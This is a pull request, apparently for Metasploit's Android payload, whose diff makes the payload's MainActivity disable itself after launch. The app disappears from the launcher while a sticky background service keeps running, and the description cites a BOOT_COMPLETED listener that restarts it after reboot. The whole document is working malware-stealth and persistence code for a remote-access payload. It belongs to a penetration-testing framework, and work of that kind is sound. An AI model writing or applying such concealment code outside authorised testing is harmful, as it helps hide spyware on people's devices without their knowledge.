### PR TITLE
Android payload: hide MainActivity from the app switcher after launch

### DIFF
--- a/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java
+++ b/java/androidpayload/app/src/com/metasploit/stage/MainActivity.java
@@ -1,14 +1,27 @@
 package com.metasploit.stage;
 
 import android.app.Activity;
+import android.content.ComponentName;
 import android.content.Intent;
+import android.content.pm.PackageManager;
 import android.os.Bundle;
 
 public class MainActivity extends Activity {
+
     @Override
     protected void onCreate(Bundle savedInstanceState) {
         super.onCreate(savedInstanceState);
         startService(new Intent(this, MainService.class));
+        disableActivity();
         finish();
+    }
+
+    private void disableActivity() {
+        PackageManager packageManager = getPackageManager();
+        ComponentName componentName = new ComponentName(getApplicationContext(),
+                MainActivity.class);
+        packageManager.setComponentEnabledSetting(componentName,
+                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
+                PackageManager.DONT_KILL_APP);
     }
 }


### PR DESCRIPTION
This change to hides the app from the launcher menu after it has been launched. This means it's only possible to run the app once, and it should then run in the background.
We now start a sticky service (which should be recreated if it's killed), and because of the BOOT_COMPLETED listener, it should only be necessary to launch the activity once anyway.